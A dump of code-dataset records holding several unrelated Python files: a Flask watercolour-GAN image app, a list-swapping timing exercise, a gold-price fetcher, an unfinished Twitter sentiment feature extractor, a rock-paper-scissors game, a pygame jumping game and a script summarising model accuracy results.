super(Generator, self).__init__()\n # got rid of vgg layers, changed kernal size to 4x4\n self.conv_layers = nn.Sequential(\n nn.Conv2d(3, 64, 4, 1, 1),\n nn.LeakyReLU(),\n nn.BatchNorm2d(64),\n nn.Conv2d(64, 128, 4, 1, 1),\n nn.LeakyReLU(),\n nn.BatchNorm2d(128),\n nn.Conv2d(128, 256, 4, 1, 1),\n nn.LeakyReLU(),\n nn.BatchNorm2d(256)\n )\n\n # 9 resnet blocks\n self.resnet_layers = nn.Sequential(\n BasicBlock(256, 256),\n BasicBlock(256, 256),\n BasicBlock(256, 256),\n BasicBlock(256, 256),\n BasicBlock(256, 256),\n BasicBlock(256, 256),\n )\n\n # the 3 transposed convolution layers\n self.tconv_layers = nn.Sequential(\n nn.ConvTranspose2d(256, 128, 4, 1, 1),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(),\n\n nn.ConvTranspose2d(128, 64, 4, 1, 1),\n nn.BatchNorm2d(64),\n nn.LeakyReLU(),\n\n nn.ConvTranspose2d(64, 3, 4, 1, 1),\n nn.LeakyReLU(),\n nn.Tanh()\n )\n\n def init_layer(layer):\n if type(layer).__name__[:4] == 'Conv':\n nn.init.xavier_uniform_(layer.weight)\n elif layer.__class__.__name__[:9] == 'BatchNorm':\n nn.init.normal_(layer.weight, 1.0, 0.02)\n nn.init.constant_(layer.bias, 0.0)\n elif type(layer).__name__[:5] == \"Basic\":\n nn.init.xavier_uniform_(layer.conv1.weight)\n nn.init.xavier_uniform_(layer.conv2.weight)\n \n\n\n self.tconv_layers.apply(init_layer)\n self.resnet_layers.apply(init_layer)\n self.conv_layers.apply(init_layer)\n\n \n def forward(self, samples):\n # pass sample through all the layers\n out = self.conv_layers(samples)\n out = self.resnet_layers(out)\n out = self.tconv_layers(out)\n return out\n\nmodel = pickle.load(open(os.path.join(basedir,'model.pkl'), 'rb'))\n\napp.config.update(\n UPLOADED_PATH= os.path.join(basedir,'uploads'),\n RESULT_PATH= os.path.join(basedir,'results'),\n IMAGES_PATH= os.path.join(basedir,'images'),\n DROPZONE_MAX_FILE_SIZE = 1024,\n DROPZONE_ALLOWED_FILE_CUSTOM = True,\n DROPZONE_ALLOWED_FILE_TYPE = 'image/*',\n DROPZONE_DEFAULT_MESSAGE = \"\",\n DROPZONE_INVALID_FILE_TYPE = \"Please upload a photo\",\n DROPZONE_MAX_FILES = 1,\n DROPZONE_MAX_FILE_EXCEED = \"\",\n DROPZONE_TIMEOUT = 5*60*1000,\n SEND_FILE_MAX_AGE_DEFAULT = 1)\n\ndropzone = 
Dropzone(app)\n\n# -------------------------------------------- Viewable Pages -------------------------------------------- #\n\n# Home page\n@app.route('/',methods=['POST','GET']) \ndef upload():\n    if request.method == 'POST':\n        deletefile()\n        f = request.files.get('file')\n        f.save(os.path.join(app.config['UPLOADED_PATH'], \"upload.jpg\"))\n    return render_template('WaterColourConverter.html')\n\n# Result page \n@app.route('/results/')\ndef resultPage():\n    device = 'cpu'\n    # transforms needed to pass the image through the model. Can change 400, 400 to another size to resize as needed\n    \n    tr = xform_none = torchvision.transforms.Compose([torchvision.transforms.ToTensor(), torchvision.transforms.Resize((400,400)), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n    MEAN = torch.tensor([0.5, 0.5, 0.5])\n    STD = torch.tensor([0.5, 0.5, 0.5])\n    img = tr(Image.open(os.path.join(app.config['UPLOADED_PATH'], \"upload.jpg\"))).unsqueeze(0).to(device)\n    # gen is the tensor with the transformed image\n    \n    gen = model(img).cpu() * STD[:, None, None] + MEAN[:, None, None]\n    save_image(gen, os.path.join(app.config['RESULT_PATH'], \"result.jpg\"))\n    return render_template('index.html')\n\n\n# -------------------------------------------- Pages for image management ------------------------------ #\n\n# Used to return final result image\n@app.route('/resultImage/', methods=['GET', 'POST'])\ndef download():\n    return send_from_directory(app.config['RESULT_PATH'], filename=os.listdir(app.config['RESULT_PATH'])[0])\n\n# Used to return images for webpage so frontend can display any image stored on the server\n@app.route('/uploads/<filename>', methods=['GET', 'POST'])\ndef displayImage(filename):\n    return send_from_directory(directory=app.config['IMAGES_PATH'], filename=filename)\n    \n# Delete all uploaded and result files and reroutes to main page\n@app.route('/deleteUploads', methods=['GET', 'POST'])\ndef deletefile():\n\n    for filename in os.listdir(app.config['UPLOADED_PATH']):\n        file_path = os.path.join(app.config['UPLOADED_PATH'], filename)\n        os.remove(file_path)\n    \n    for filename in os.listdir(app.config['RESULT_PATH']):\n        file_path = os.path.join(app.config['RESULT_PATH'], filename)\n        os.remove(file_path)\n\n    return redirect(\"/\")\n\n@app.after_request\ndef add_header(response):\n    response.cache_control.no_store = True\n    if 'Cache-Control' not in response.headers:\n        response.headers['Cache-Control'] = 'no-store'\n    return response\n\nif __name__ == \"__main__\":\n    app.run(debug=True)","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"479884691","text":"\"\"\"\n1. 
Analyse the speed and complexity of any one of the algorithms\ndeveloped for the homework of the first three lessons.\nNote: try writing several implementations of the algorithm and comparing them.\n\"\"\"\n\nfrom random import randint\nfrom random import shuffle\nfrom timeit import Timer\n\n\ndef change_places_min_max():\n    \"\"\"\n    The function swaps the minimum and\n    maximum elements of an array\n    :return: Array\n    \"\"\"\n\n    my_list = list(set(randint(0, 30) for i in range(30)))\n    # define the variables, giving the minimum one the largest value\n    # and the maximum one the smallest\n    MIN_EL = 30\n    MAX_EL = 0\n    MIN_EL_KEY = 0\n    MAX_EL_KEY = 0\n\n    # shuffle the \"array\" to make things more interesting\n    shuffle(my_list)\n    for key, value in enumerate(my_list):\n\n        # look for the maximum and minimum\n        # elements and remember their indices\n        # (plain min() and max() would be no fun)\n        if value > MAX_EL:\n            MAX_EL = value\n            MAX_EL_KEY = key\n        elif value < MIN_EL:\n            MIN_EL = value\n            MIN_EL_KEY = key\n\n        # once MAX_EL holds the largest possible value\n        # and MIN_EL the smallest one - stop searching\n        if MAX_EL == 30 and MIN_EL == 0:\n            break\n    # swap the minimum and maximum values\n    my_list[MIN_EL_KEY], my_list[MAX_EL_KEY] = my_list[MAX_EL_KEY], my_list[MIN_EL_KEY]\n    return my_list\n\n\nt1 = Timer(\"change_places_min_max()\", setup=\"from __main__ import change_places_min_max\")\nprint('change_places_min_max', t1.timeit(number=1000), 'milliseconds')\n\n\ndef change_places_min_max_two():\n    \"\"\"\n    The function swaps the minimum and\n    maximum elements of an array\n    :return: Array\n    \"\"\"\n\n    my_list = list(set(randint(0, 30) for i in range(30)))\n    # find the minimum and maximum values with the built-ins\n\n    MIN_EL = min(my_list)\n    MAX_EL = max(my_list)\n\n    shuffle(my_list)\n\n    MIN_EL_KEY = my_list.index(MIN_EL)\n    MAX_EL_KEY = my_list.index(MAX_EL)\n\n    # swap the minimum and maximum values\n    my_list[MIN_EL_KEY], my_list[MAX_EL_KEY] = my_list[MAX_EL_KEY], my_list[MIN_EL_KEY]\n    return my_list\n\n\nt2 = Timer(\"change_places_min_max_two()\", setup=\"from __main__ import change_places_min_max_two\")\nprint('change_places_min_max_two', t2.timeit(number=1000), 'milliseconds')\n\n# The complexity looks close to linear\n# timeit for the first implementation reports change_places_min_max 0.07574980199933634 milliseconds\n# timeit for the second implementation reports change_places_min_max_two 0.07802550199994585 milliseconds\n# The difference is not in favour of the built-in functions, most likely\n# because of the double search, i.e. 
first we search for the element and then for its index as well\n","sub_path":"Lesson_4/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"622533800","text":"import requests\n\nclass Gold(object):\n    def __init__(self):\n        self.headers = {\n            'Accept-Encoding': 'gzip, deflate, sdch',\n            'Accept-Language': 'en-US,en;q=0.8',\n            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',\n            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n            'Referer': 'http://www.wikipedia.org/',\n            'Connection': 'keep-alive'}\n        self.url = \"https://data-asg.goldprice.org/dbXRates/USD\"\n\n    @property\n    def get(self):\n        try:\n            r = requests.get(url=self.url, headers= self.headers, timeout=1)\n            if r.ok:\n                return r\n            else:\n                return None\n        except requests.exceptions.Timeout:\n            return 'Bad Response'\n","sub_path":"Demo/Third/gold.py","file_name":"gold.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"592037371","text":"\n# coding: utf-8\n\n# In[1]:\n\nfrom bs4 import BeautifulSoup\nfrom bs4 import NavigableString\nimport re\nimport string\nimport nltk.tree\nimport nltk.tokenize\nimport nltk.corpus\nfrom nltk.corpus import sentiwordnet as swn\nfrom nltk.corpus import wordnet as wn\nfrom nltk.tokenize import TweetTokenizer\nfrom nltk.tree import *\nimport csv\nimport pandas as pd\nimport collections\nimport urllib2\nimport numpy as np\nfrom sklearn import svm\nfrom sklearn.svm import SVC\n\n\n# In[2]:\n\ndef buildSlangDictionary():\n    alpha = list(map(chr, range(ord('a'), ord('z')+1)))\n    url = 'http://www.noslang.com/dictionary/'\n    headers = {\n        'User-Agent': \"Mozilla/5.0 (Windows NT 6.1; Win64; x64)\",\n        'Accept': \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n        'Accept-Language': \"de,en-US;q=0.7,en;q=0.3\",\n        'Accept-Charset': \"ISO-8859-1,utf-8;q=0.7,*;q=0.3\",\n        'Accept-Encoding': 'none',\n        'Connection': \"keep-alive\"\n    }\n    slang_dict = collections.defaultdict(str)\n    for letter in alpha:\n        url = url + letter + '/'\n        req = urllib2.Request(url, headers=headers)\n        response = urllib2.urlopen(req)\n        soup = BeautifulSoup(response)\n        abbr_list = []\n        for abbr in soup.findAll('abbr'):\n            abbr_list.append(abbr)\n        for x in abbr_list:\n            temp = x.contents[0].contents[0].contents\n            if isinstance(temp[0], NavigableString):\n                slang = ''.join(temp)\n                slang = slang.encode('ascii', 'ignore')\n                slang = slang.split(' :')[0]\n                meaning = x['title']\n                slang_dict[slang] = meaning\n        url = url[:-2]\n    return slang_dict\n\n\n# In[3]:\n\ndef removeRepeatedSequence(word):\n    # collapse any run of a repeated character down to two (e.g. 'coooool' -> 'cool')\n    pattern = re.compile(r'(.)\\1{1,}',re.DOTALL)\n    return pattern.sub(r'\\1\\1', word)\n\n\n# In[4]:\n\ndef getWordVector(tweet):\n    wordVector = []\n    with open('StopWords.txt', 'r') as f:\n        stopWords = f.read().split('\\n')[1:-1]\n    f.close()\n    words = tweet.split()\n    for word in words:\n        word = removeRepeatedSequence(word)\n        word = word.strip('\\'\"?,.')\n        s = re.search(r'^[a-zA-Z][a-zA-Z0-9]*$', word)\n        if word.lower() in stopWords or s is None:\n            continue\n        else:\n            wordVector.append(word.lower())\n    return wordVector\n    \n\n\n# In[5]:\n\ndef preProcessTweet(tweet, emoji_dict):\n    tweet = tweet.lower()\n    negative_words = ['not','no','never','n\\'t','cannot','isn\\'t','isnt']\n    tweet = re.sub(r'{(\\s)*link(\\s)*}','U',tweet)\n    tweet = 
re.sub(r'@(\\s)*(\\w)+','@target',tweet)\n tweet = re.sub(r'[\\s]+',' ',tweet)\n tweet = re.sub(r'#(\\s)*(\\w)+',r'\\2',tweet)\n tweet = tweet.strip('\\'\"')\n \n tokeniser = TweetTokenizer() #Have to use something else as it is seperating the emoticon\n tweet_tokens = tokeniser.tokenize(tweet)\n for x in range(len(tweet_tokens)):\n token = tweet_tokens[x]\n if len(token) == 1 and ord(token) not in range(0,128):\n continue\n token = str(token)\n if token in negative_words:\n token = 'NOT'\n if token in emoji_dict:\n if emoji_dict[token] <= -3:\n token = 'EXTREMELY-NEGATIVE'\n if emoji_dict[token] > -3 and emoji_dict[token] < 0:\n token = 'NEGATIVE'\n if emoji_dict[token] == 0:\n token = 'NEUTRAL'\n if emoji_dict[token] > 0 and emoji_dict[token] < 3:\n token = 'POSITIVE'\n if emoji_dict[token] >= 3:\n token = 'EXTREMELY-POSITIVE'\n tweet_tokens[x] = token\n tweet = ' '.join(tweet_tokens)\n \n return tweet\n \n \n\n\n# In[6]:\n\ndef buildUnigramVector(tweets, wordList):\n \n features = []\n sentiment = []\n for tweet in tweets:\n sentiment = 0\n wordMap = {}\n for word in sorted(wordList):\n wordMap[word] = 0\n \n tweetWords = tweet[0]\n for w in tweetWords:\n w = removeRepeatedSequence(w)\n w = w.strip('\\'\".,?')\n if w in wordMap:\n wordMap[w] = 1\n val = wordMap.values()\n features.append(val)\n sentiment.append(tweet[1])\n unigramVector = {'unigram_vector':features, 'sentiment': sentiment}\n return unigramVector\n \n\n\n# In[ ]:\n\ndef sentiFeatures():\n slang_dict = DictionaryBuilder()\n negative_word_list =['not','no','never','n\\'t','cannot']\n train = pd.read_csv(\"train.csv\")\n\n with open('StopWords.txt', 'r') as f:\n stopWords = f.read().split('\\n')[1:-1]\n f.close()\n \n emoticon_dict = collections.defaultdict(int)\n reader = csv.reader(open('emoticons.csv', 'r'), skipinitialspace=True)\n for row in reader:\n emoticon_dict[row[0].strip()] = int(row[1])\n \n prev_tag = ''\n tree_list =[]\n feature_vector =[]\n tweets_tagged =[]\n tokenizer = TweetTokenizer()\n for line in reader:\n tweets_tagged.append(line)\n\n featureList =[]\n\n tweets =[]\n for i in range(len(train)):\n tweet = train['tweet'][i]\n sentiment = train['sentiment'][i]\n \n tweet = preProcessTweet(tweet, emoticon_dict)\n f1, f2, f3, f4, f5, f6, f7, f9, f10, f11 = 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0\n tweet_tagged = tweets_tagged[i]\n \n tokens = tokenizer.tokenize(tweet)\n tagged_dict = collections.defaultdict(str)\n \n for word in tweet_tagged:\n if len(word.split('_') == 2):\n word, tag = word.split('_')\n tagged_dict[word] = tag\n \n for j in range(len(tokens)):\n token = tokens[j]\n if token == '!':\n f11=1.0\n if prev_tag == 'polar':\n f4+=1.0\n continue\n \n if len(token) == 1 and ord(token) not in range(1, 128):\n continue\n else:\n token = str(token)\n \n if token == '@target':\n token = '||T||'\n f7+=1.0\n prev_tag = 'target'\n continue\n if token == 'U':\n token = '||U||'\n f7+=1.0\n prev_tag = 'link'\n continue\n if token.startswith('#'):\n f4+=1.0\n f7+=1.0\n prev_tag = 'hash'\n continue\n \n if not (re.match(r'a-zA-Z', token) != None or token != removeRepeatedSequence(token)):\n prev_tag = 'emp'\n continue\n \n if token in stopWords:\n prev_tag = 'stop'\n continue\n \n if token.lower() in slang_dict:\n prev_tag = 'slang'\n token = slang_dict[token.lower()]\n f6+=1.0\n continue\n \n if token == 'POSITIVE' or token == 'EXTREMENLY-POSITIVE' or token == 'NEGATIVE' or token == 'EXTREMELY-NEGATIVE':\n f3+=1.0\n continue\n \n if token == 'NOT':\n f2+=1.0\n continue\n \n synsets = 
swn.senti_synsets(token)\n if len(synsets) > 0:\n \n score = max([synset.pos_score(), synset.neg_score(), synset.obj_score()])\n if synset.pos_score() == synset.neg_score() or synset.obj_score() == score:\n score = 0.0\n if synset.pos_score() < synset.neg_score():\n score = -score\n \n if score != 0.0:\n prev_tag = 'polar'\n f2+=1.0\n if token.isupper() == True:\n f4+=1.0\n f11=1.0\n \n f8 = {}\n if token in tagged_dict and (tagged_dict[token] == 'JJ' or tagged_dict[token] == 'RB' or tagged_dict[token] == 'VB' or tagged_dict[token] == 'NN'): \n f1+=1.0\n f8[tagged_dict[token]]+=score\n else:\n f9+=score\n else:\n prev_tag = 'non-polar'\n if token in tagged_dict and (tagged_dict[token] == 'JJ' or tagged_dict[token] == 'RB' or tagged_dict[token] == 'VB' or tagged_dict[token] == 'NN'): \n f5 += 1.0\n if token.isupper():\n f10 += 1.0\n f11 = 1.0\n continue\n else:\n prev_tag = 'non-polar'\n if token in tagged_dict and (tagged_dict[token] == 'JJ' or tagged_dict[token] == 'RB' or tagged_dict[token] == 'VB' or tagged_dict[token] == 'NN'): \n f5 += 1.0\n if token.isupper():\n f10 += 1.0\n f11 = 1.0 \n continue\n tweet = ' '.join(tokens)\n word_vector = getWordVector(tweet)\n \n \n \n\n\n# In[ ]:\n\nfrom nltk.tag import StanfordPOSTagger\nst = StanfordPOSTagger('english-bidirectional-distsim.tagger') \n\n","sub_path":"agarwal/Twitter_Sentiment_Analysis/Agarwal.py","file_name":"Agarwal.py","file_ext":"py","file_size_in_byte":9251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"571386213","text":"# Rock Paper Python V1.0\n# Written by Briana Morgan 6/4/20\n# Standard rock paper scissors game with two AI modes, best out of three rounds. Random mode will choose a random selection.\n# Smart mode will base its choice on statistics. The strategy is based on experiments of Zhejiang University.\n\nimport random\n\n#Variable declaration\n\nuserScore = 0\nCPUScore = 0\noptions = ['rock' , 'paper' , 'scissors']\ngameModes = ['random' , 'smart']\nuserLastChoice = None\nbeats={\n \"rock\": \"scissors\",\n \"paper\": \"rock\",\n \"scissors\": \"paper\"\n}\n\n#functions\ndef coreLogic(CPU,User):\n if User == CPU :\n return \"tie\"\n if beats[CPU] == User:\n return \"lose\"\n else:\n return \"win\"\n\ndef randomMode():\n CPUChoice = random.choice(options) \n print(\"CPU chose \" + CPUChoice)\n return CPUChoice\n\ndef smartMode():\n CPUChoice = beats[userLastChoice]\n print(\"CPU chose \" + CPUChoice)\n return CPUChoice\n \ndef resultProcess(result) :\n global userScore\n global CPUScore\n if result == 'win' :\n print(\"You won!\")\n userScore +=1\n if result == 'tie' :\n print(\"You tied!\")\n if result == 'lose' :\n print(\"You Lost!!\")\n CPUScore +=1\n \ndef scoreProcess() :\n if userScore == 2 :\n print(name + \" won 2 out of three rounds! You're awesome!\")\n exit()\n elif CPUScore == 2 :\n print(name + \" lost out of three rounds! Oh, dear...\")\n exit()\n\ndef inputValidate(choice) :\n if choice not in options :\n raise Exception('Invalid choice')\n return choice\n\n#collect input options\nprint(\"Welcome to Briana's Rock Paper Scissors Game!\")\nprint(\"Please enter your name:\")\nname = input()\nprint(\"Hello \" + name)\nprint (f\"Please select difficulty: {gameModes}\")\nDifficulty = input()\n#validate input\nif Difficulty not in gameModes :\n raise Exception('Invalid difficulty')\n\n#collect first round\nprint(\"This game is best out of 3 rounds. 
Please make your first choice.\")\nroundNumber = 1\nwhile roundNumber < 4:\n print(\"Round number:\",roundNumber,\"Your Score:\",userScore,\"CPU Score:\",CPUScore)\n print(f\"Options are {options}\")\n choice = inputValidate( input() )\n \n if Difficulty == 'random':\n CPUChoice = randomMode()\n resultProcess( coreLogic(CPUChoice,choice) )\n\n if Difficulty == 'smart':\n if roundNumber == 1:\n CPUChoice = randomMode()\n resultProcess( coreLogic(CPUChoice,choice) )\n else: \n CPUChoice = smartMode()\n resultProcess( coreLogic(CPUChoice,choice) )\n\n roundNumber +=1\n scoreProcess()\n userLastChoice = choice\n\n#find out who won or if tie\nif CPUScore > userScore :\n print(name + \" lost out of three rounds! Yikes.\")\nelif CPUScore == userScore :\n print(name + \" and CPU tied! Please play again :)\")\nelse :\n print(name + \" won best out of three rounds! Way to go!\")\n","sub_path":"RockPaper.py","file_name":"RockPaper.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"187856711","text":"#Used trademark of FastMonkeys\n#Jumping sound is credited do Dklon\n\nimport pygame as pg\nimport random\nfrom Settings import *\nfrom Sprites import *\nfrom os import path\nfrom os import getcwd\n\nclass Game:\n def __init__(self):\n # initialize game window, etc\n pg.init()\n pg.mixer.init()\n pg.mixer.init()\n self.screen = pg.display.set_mode((WIDTH, HEIGHT))\n pg.display.set_caption(TITLE)\n self.clock = pg.time.Clock()\n self.obstacle_speed = STARTING_SPEED\n self.running = True\n self.load_data()\n self.obstacles_jumped = -1 \n self.sys_font = pg.font.SysFont(\"None\", size=50)\n self.sys_font.render(\"Obstacles jumped: \", 0, (255,255,255))\n\n def load_data(self):\n self.dir = path.dirname(__file__) \n self.assets_dir = path.join(self.dir, \"Assets\")\n self.obstacles_spritesheet = Spritesheet(path.join(self.assets_dir, OBSTACLES_SPRITESHEET))\n self.monkey_spritesheet = Spritesheet(path.join(self.assets_dir, MONKEY_SPRITESHEET))\n self.jump_sound = pg.mixer.Sound(path.join(self.assets_dir, \"jump_03.wav\"))\n\n\n def new(self):\n # start a new game\n self.obstacles_jumped = -1\n self.obstacle_speed = STARTING_SPEED\n self.all_sprites = pg.sprite.Group()\n self.platform_sprites = pg.sprite.Group()\n self.obstacle_sprites = pg.sprite.Group()\n self.player = Monkey(self)\n self.ground = Ground()\n #self.obstacle = Obstacle(self, -5, 0) #poczatkowa przeszkoda\n self.spawn_obstacle()\n self.all_sprites.add(self.ground)\n self.platform_sprites.add(self.ground)\n self.all_sprites.add(self.player)\n self.run()\n\n def spawn_obstacle(self):\n self.set_obstacle_speed()\n self.obstacle = None\n self.obstacle = Obstacle(self, self.obstacle_speed, 0)\n self.all_sprites.add(self.obstacle)\n self.obstacle_sprites.add(self.obstacle)\n self.obstacles_jumped += 1\n\n def set_obstacle_speed(self):\n if self.obstacles_jumped % CHANGE_OBSTACLE_SPEED_EVERY_N == 0 :\n self.obstacle_speed *= 1.1 \n\n def get_obstacles_jumped_caption(self):\n obst_jumped = self.sys_font.render(\"Obstacles jumped: \" + str(self.obstacles_jumped) , 0, (255,255,255))\n return obst_jumped\n\n def get_speed_caption(self):\n speed_calc = (self.obstacle_speed/STARTING_SPEED) * 100\n return self.sys_font.render(\"Current speed: \" + str(int(speed_calc)) + \"%\" , 0, (255,255,255))\n\n def run(self):\n # Game Loop\n self.show_start_screen()\n self.playing = True\n while self.playing:\n self.clock.tick(FPS)\n self.events()\n self.update()\n 
self.draw()\n\n def update(self):\n # Game Loop - Update\n \n self.all_sprites.update()\n platform_hits = pg.sprite.spritecollide(self.player, self.platform_sprites, dokill=False)\n if platform_hits:\n self.player.pos.y = platform_hits[0].rect.top\n self.player.walking = True\n self.player.vel.y = 0 \n #detect collision with obstacle and kill player\n obstacle_hits = pg.sprite.spritecollide(self.player, self.obstacle_sprites, dokill=False)\n if obstacle_hits:\n self.write_highest_score()\n self.playing = False\n\n #spawn new obstacle once old one disappears \n if self.obstacle.rect.right < 0:\n self.spawn_obstacle()\n\n def write_highest_score(self):\n if self.obstacles_jumped >self.read_highest_score():\n with open(path.join(getcwd(), HIGHSCORE), 'w') as f :\n f.write(str(self.obstacles_jumped))\n\n \n def read_highest_score(self):\n try:\n with open(path.join(getcwd(), HIGHSCORE), 'r') as f :\n highscore = int(f.read())\n except:\n highscore = 0\n return highscore \n\n def events(self):\n # Game Loop - events\n for event in pg.event.get():\n # check for closing window\n if event.type == pg.QUIT:\n if self.playing:\n self.playing = False\n self.running = False\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_SPACE:\n self.player.jump()\n\n def draw(self):\n # Game Loop - draw\n self.screen.fill(BLACK)\n #draw captions\n self.screen.blit(self.get_obstacles_jumped_caption(), (20, 50))\n self.screen.blit(self.get_speed_caption(), (20, 100))\n #draw sprites\n self.all_sprites.draw(self.screen)\n # *after* drawing everything, flip the display\n pg.display.flip()\n\n def show_start_screen(self):\n highscore = self.read_highest_score()\n self.screen.fill(LIGHTBLUE)\n logo = pg.image.load(path.join(self.assets_dir, \"logo-fastmonkeys.png\"))\n self.screen.blit(logo, (WIDTH/2 - 115, 40))\n self.draw_text(\"Press spacebar to start a new game\", BLACK, WIDTH/2, HEIGHT/4)\n self.draw_text(\"Highscore \" + str(highscore), BLACK, WIDTH/2, HEIGHT/3)\n pg.display.flip()\n waiting = True\n while waiting:\n self.clock.tick(FPS)\n for e in pg.event.get():\n if e.type == pg.KEYDOWN:\n if e.key == pg.K_SPACE:\n waiting = False\n \n if e.type == pg.QUIT:\n waiting = False\n self.running = False\n \n \n def draw_text(self, text, color, x, y):\n text_surface = self.sys_font.render(text, True, color)\n text_rect = text_surface.get_rect()\n text_rect.midtop = (x,y)\n self.screen.blit(text_surface, text_rect)\n\n def show_go_screen(self):\n # game over/continue\n pass\n\ng = Game()\ng.show_start_screen()\nwhile g.running: \n g.new()\n \n\npg.quit()","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":5975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"318186344","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Oct 16 13:35:52 2019\r\n\r\n@author: arje\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\nimport cloudpickle as pickle\r\nfrom datetime import timedelta\r\nimport datetime\r\nimport matplotlib.pyplot as plt\r\n\r\n\"\"\"\r\nReading in the new Detect data\r\n\"\"\"\r\nseed=[12,3491,6054,9852,333,7878,5555,497,103053,45645]\r\n\r\nexpo=[1000,1500,2000]\r\naperture=[3.8,8,16]\r\n\r\nres = {}\r\nres['Exposure']=[]\r\nres['Aperture']=[]\r\nres['Test accuracy']=[]\r\nres['std(Test accuracy)']=[]\r\nfor ex in expo:\r\n for ap in aperture:\r\n res['Exposure'].append(str(ex))\r\n res['Aperture'].append(ap)\r\n fo='./data/Expo_'+str(ex)+'_Ap_'+str(ap)\r\n \r\n acc=[]\r\n time=[]\r\n for ind, se in enumerate(seed):\r\n 
fid=open(fo+'/'+str(se)+'_sum_res_iv.pickle','rb')\r\n acc.append(pickle.load(fid)['test_sum_accuracy'])\r\n fid.close()\r\n\r\n res['Test accuracy'].append(np.mean(acc))\r\n res['std(Test accuracy)'].append(np.std(acc))\r\n \r\nfid=open('./iv3_sum_results.pickle','wb')\r\npickle.dump(res,fid)\r\nfid.close()\r\n\r\n#fid=open('./iv3_results.pickle','rb')#inceptionV3\r\n#fid=open('./clean_data_results.pickle','rb')#resnet50\r\n#res=pickle.load(fid)\r\n#fid.close()\r\n#res\r\n\r\n#acc1000=np.array(res['Test accuracy'][0:3])\r\n#std1000=np.array(res['std(Test accuracy)'][0:3])\r\n#acc1500=np.array(res['Test accuracy'][3:6])\r\n#std1500=np.array(res['std(Test accuracy)'][3:6])\r\n#acc2000=np.array(res['Test accuracy'][6:9])\r\n#std2000=np.array(res['std(Test accuracy)'][6:9])\r\n\r\n\r\n#Let's move the aperture around a bit for a prettier picture\r\n#res['Aperture']=[3.5,7.7,15.7,3.8,8,16,4.1,8.3,16.3]\r\n\r\n#fig, ax = plt.subplots()\r\n#ax.plot(aperture, acc1000)\r\n#ax.fill_between(aperture, acc1000+std1000, acc1000-std1000, alpha=0.5)\r\n#ax.errorbar(res['Aperture'][0:3], acc1000, yerr=2*std1000, fmt='o')\r\n#ax.set(xlabel='Aperture', ylabel='Test accuracy',\r\n# title='Camera settings results')\r\n#ax.legend(loc='lower left',title='Exposure')\r\n#ax.plot(aperture, acc1500)\r\n#ax.fill_between(aperture, acc1500+std1500, acc1500-std1500, alpha=0.5)\r\n#ax.errorbar(res['Aperture'][3:6], acc1500, yerr=2*std1500, fmt='o')\r\n#ax.set(xlabel='Aperture', ylabel='Test accuracy',\r\n# title='Camera settings results')\r\n#ax.plot(aperture, acc2000)\r\n#ax.fill_between(aperture, acc2000+std2000, acc2000-std2000, alpha=0.5)\r\n#ax.errorbar(res['Aperture'][6:9], acc2000, yerr=2*std2000, fmt='o')\r\n#ax.set(xlabel='Aperture', ylabel='Test accuracy',\r\n# title='Camera settings results')\r\n\r\n\r\n\r\n#import pandas as pd\r\n#df=pd.DataFrame(res)\r\n\r\n#fig, ax = plt.subplots() # 1\r\n#ax.legend(loc='best',title='Exposure',bbox_to_anchor=(0.5, 0.7))\r\n#ax.set(xlabel='Aperture', ylabel='Test accuracy',\r\n# title='InceptionV3')\r\n#ax.get_legend().set_bbox_to_anchor((.8532,.3))\r\n#ax.set_ylim(0.88, 0.99)\r\n#for key, group in df.groupby('Exposure'):\r\n# group.plot('Aperture', 'Test accuracy', yerr='std(Test accuracy)', label=key, ax=ax)\r\n#\r\n#fig.savefig('./camera_settings_results_iv3.png')\r\n#plt.show()\r\n","sub_path":"Johanna/iv3_sum_results.py","file_name":"iv3_sum_results.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"407245207","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2004-2010 Tiny SPRL ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. 
